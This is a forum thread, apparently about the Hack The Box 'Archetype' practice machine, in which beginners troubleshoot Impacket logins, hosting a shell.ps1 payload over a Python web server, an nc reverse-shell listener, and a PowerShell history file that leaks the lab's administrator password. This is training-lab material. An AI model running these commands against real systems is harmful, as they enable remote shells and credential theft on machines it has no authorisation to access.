Starting Point: Foothold

SOLVED: No idea why it worked any different, but I tried it again and I’m good to go. Syntax was the same and I can’t tell you how many times I’ve hand jammed/copy pasted the password in. Oh well.

Supreme noob here,

Trying to get started with Starting Point and I’m already running into issues.

On the very first Starting Point I am trying to use Impacket’s mssqlclient.py on the SQL port on target.

I have the username and password needed to use the script but it’s telling me

kali@kali:~/Downloads/impacket-master/examples$ python3 mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth
Impacket v0.9.22.dev1 - Copyright 2020 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[-] ERROR(ARCHETYPE): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.

I don’t have too much context on the network but I feel like the issue is far more elementary than that to be getting errors like incorrect domains…

I suspect that it’s because I maybe installed impacket with pip3 instead of pip like the readme told me to do. But I don’t think that would make a difference.

Any tips would be appreciated.

bump

Here’s another thread covering the same topic… a lot of people are having issues with this step… doesn’t make any sense. I’ve not found a solution yet either.

I need help setting up the server.
I continue to get this message from the terminal. Can anyone tell me why the command is not running? I was under the impression that it will work in the folder containing the file shell.ps1

zatoichi@kali:~/Downloads/shell.ps1$ sudo python3 -m http.server 80
[sudo] password for zatoichi:
Traceback (most recent call last):
  File "/usr/lib/python3.8/runpy.py", line 193, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "/usr/lib/python3.8/runpy.py", line 86, in _run_code
    exec(code, run_globals)
  File "/usr/lib/python3.8/http/server.py", line 1294, in <module>
    test(
  File "/usr/lib/python3.8/http/server.py", line 1249, in test
    with ServerClass(addr, HandlerClass) as httpd:
  File "/usr/lib/python3.8/socketserver.py", line 452, in __init__
    self.server_bind()
  File "/usr/lib/python3.8/http/server.py", line 1292, in server_bind
    return super().server_bind()
  File "/usr/lib/python3.8/http/server.py", line 138, in server_bind
    socketserver.TCPServer.server_bind(self)
  File "/usr/lib/python3.8/socketserver.py", line 466, in server_bind
    self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use
zatoichi@kali:~/Downloads/shell.ps1$

Thank you

@zatoichi79 said:

I need help setting up the server.
I continue to get this message from the terminal. Can anyone tell me why the command is not running? I was under the impression that it will work in the folder containing the file shell.ps1

I’m just as new as you are. But I’ve run into this issue as well. Whenever something like this happens, sometimes it’s best to just reset all your connections. Worked for me once I restarted my VPN. Might even try reverting to your VM snapshot.

Take this with a grain of salt.

Thanks. Now I am stuck at the last point, escalation. I managed to get all the information, but when I am prompted for the password I use both passwords from the shell.ps1 document, and I also tried the MAGACORP_4dm1n!! and the Password=M3g4c0rp123 for the ARCHETYPE user, and this is what I get:

root@kali:/home/zatoichi# nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.27] 49685
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit

psexec.py adminstrator@10.10.10.27

zatoichi@kali:~$ sudo su
root@kali:/home/zatoichi# psexec.py adminstrator@10.10.10.27
Impacket v0.9.22.dev1+20200424.150528.c44901d1 - Copyright 2020 SecureAuth Corporation

Password:
[-] Authenticated as Guest. Aborting
[-] Error performing the uninstallation, cleaning up
root@kali:/home/zatoichi#

Do you know how to get the real password? I continue to get the above message.

You’re not alone… I’m stuck at this last step too :(

Well guys, I was suffering from this same problem…
After looking in Impacket’s GitHub repo, I found that some examples need the package pyOpenSSL to work properly.
Install the package and all works fine after all.
pip3 install pyOpenSSL

@zatoichi79 said:

I need help setting up the server.
I continue to get this message from the terminal. Can anyone tell me why the command is not running? I was under the impression that it will work in the folder containing the file shell.ps1

Hi, did you manage to solve this OSError: [Errno 98] Address already in use? I’m stuck here too.

I also had the issue with the following error when running mssqlclient.py:

[-] ERROR(ARCHETYPE): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.

Solution for me was to run python3 with sudo.